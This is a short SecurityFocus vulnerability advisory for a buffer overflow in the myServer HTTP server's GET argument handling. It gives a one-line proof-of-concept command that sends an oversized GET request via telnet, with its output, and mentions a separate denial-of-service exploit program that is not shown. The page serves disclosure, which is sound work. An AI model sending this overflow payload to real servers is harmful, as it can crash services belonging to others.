Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

myServer HTTP GET Argument Buffer Overflow Vulnerability

The following proof of concept has been submitted:

$ echo "GET /`perl -e 'printf "A"x4100'`" | telnet example.com 80
Trying 127.0.0.1...
Connected to example.com.
Escape character is '^]'.
Connection closed by foreign host.

An exploit program (sp-myserver0.5-dos.c) has also been made available by badpack3t and is available below.







 

Privacy Statement
Copyright 2009, SecurityFocus